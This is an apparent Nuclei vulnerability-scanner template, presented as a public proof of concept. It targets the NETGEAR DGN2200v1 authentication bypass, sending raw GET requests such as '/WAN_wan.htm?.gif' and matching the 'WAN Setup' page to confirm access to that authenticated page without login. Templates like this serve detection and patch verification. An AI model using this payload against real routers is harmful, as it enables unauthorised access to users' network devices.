NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring.
PoC代码[已公开]
id: netgear-router-auth-bypass
info:
name: NETGEAR DGN2200v1 - Authentication Bypass
author: gy741
severity: high
description: NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring.
reference:
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cwe-id: CWE-287
metadata:
max-request: 2
tags: netgear,auth-bypass,router
http:
- raw:
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /WAN_wan.htm?.gif HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>WAN Setup</title>"
# digest: 4a0a00473045022100e4d489e351a0cb009efe6825ab4436fc850649d0b16fd89797e11fb24e2a2ee3022065d3afa90cd9020860622cdad7fa08c3d4f2c9b83a9ba75c4d8adee041cc930c:922c64590222798bb761d5b6d8e72950